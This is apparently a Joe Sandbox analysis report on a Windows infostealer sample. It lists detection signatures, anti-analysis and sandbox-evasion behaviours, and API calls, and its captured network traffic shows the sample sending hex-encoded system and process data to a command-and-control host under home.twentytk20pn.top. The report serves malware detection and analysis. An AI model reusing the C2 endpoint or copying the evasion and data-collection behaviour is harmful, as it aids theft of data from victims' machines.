Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1o81tDUu5M.exe

Overview

General Information

Sample name:1o81tDUu5M.exe
renamed because original name is a hash value
Original sample name:3fbe557c7ec8409f30604b0f5e365f70.exe
Analysis ID:1578916
MD5:3fbe557c7ec8409f30604b0f5e365f70
SHA1:00d9f4548c93be387f68c1b7aeedcf4c75873b60
SHA256:f4e7b423983d4606cb9a72876f57c870884b40556ab6ea3da498d69e02acacab
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 1o81tDUu5M.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\1o81tDUu5M.exe" MD5: 3FBE557C7EC8409F30604B0F5E365F70)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 1o81tDUu5M.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: 1o81tDUu5M.exeVirustotal: Detection: 57%Perma Link
Source: 1o81tDUu5M.exeReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 1o81tDUu5M.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0095DCF0
Source: 1o81tDUu5M.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: 1o81tDUu5M.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_0093255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0093255D
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_009329FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 456478Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 30 37 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 147.45.113.159 147.45.113.159
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00937770 recv,0_2_00937770
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 456478Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 30 37 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: 1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000003.1802788486.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802595901.0000000001691000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802624909.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802957386.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820980792.00000000016B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WE
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820625051.000000000160E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: 1o81tDUu5M.exe, 00000000.00000002.1820625051.000000000160E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322se
Source: 1o81tDUu5M.exe, 00000000.00000003.1802788486.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802595901.0000000001691000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802624909.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802957386.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820980792.00000000016B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEfo
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 1o81tDUu5M.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: 1o81tDUu5M.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: 1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 1o81tDUu5M.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443

System Summary

barindex
PE file contains section with special chars
Source: 1o81tDUu5M.exeStatic PE information: section name:
Source: 1o81tDUu5M.exeStatic PE information: section name: .idata
Source: 1o81tDUu5M.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016972200_3_01697220
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016972200_3_01697220
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_3_016A33720_3_016A3372
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009FB1800_2_009FB180
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009405B00_2_009405B0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00946FA00_2_00946FA0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00A000E00_2_00A000E0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009410E60_2_009410E6
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CBE0300_2_00CBE030
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009962100_2_00996210
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009FC3200_2_009FC320
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00A004200_2_00A00420
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00C9D4300_2_00C9D430
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CA35B00_2_00CA35B0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_0093E6200_2_0093E620
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CB47800_2_00CB4780
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CC17800_2_00CC1780
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009FC7700_2_009FC770
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00C967300_2_00C96730
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009E98800_2_009E9880
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009EC9000_2_009EC900
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009449400_2_00944940
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00C899200_2_00C89920
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_0093A9600_2_0093A960
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00B06AC00_2_00B06AC0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CB3A700_2_00CB3A70
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CA1BD00_2_00CA1BD0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_0093CBB00_2_0093CBB0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CA8BF00_2_00CA8BF0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00971BE00_2_00971BE0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00C97CC00_2_00C97CC0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CBCC700_2_00CBCC70
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00945DB00_2_00945DB0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CACD800_2_00CACD80
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CB4D400_2_00CB4D40
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00955EB00_2_00955EB0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00943ED00_2_00943ED0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00C4AE300_2_00C4AE30
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009FEF900_2_009FEF90
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009F8F900_2_009F8F90
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00CB9FE00_2_00CB9FE0
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00C82F900_2_00C82F90
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_00954F700_2_00954F70
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 009375A0 appears 528 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 009373F0 appears 86 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 00AE7220 appears 82 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 00974FD0 appears 182 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 00974F40 appears 174 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 009371E0 appears 42 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 00A144A0 appears 72 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 0093CAA0 appears 40 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 0094CD40 appears 40 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 0094CCD0 appears 38 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 009750A0 appears 31 times
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: String function: 00B0CBC0 appears 95 times
Source: 1o81tDUu5M.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 1o81tDUu5M.exeStatic PE information: Section: obbejfdq ZLIB complexity 0.9943257921160943
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_0093255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0093255D
Source: C:\Users\user\Desktop\1o81tDUu5M.exeCode function: 0_2_009331D7 CreateToolhelp32Snapshot,CloseHandle,0_2_009331D7
Source: C:\Users\user\Desktop\1o81tDUu5M.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\1o81tDUu5M.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 1o81tDUu5M.exeVirustotal: Detection: 57%
Source: 1o81tDUu5M.exeReversingLabs: Detection: 65%
Source: 1o81tDUu5M.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: 1o81tDUu5M.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\1o81tDUu5M.exeSection loaded: uxtheme.dllJump to behavior
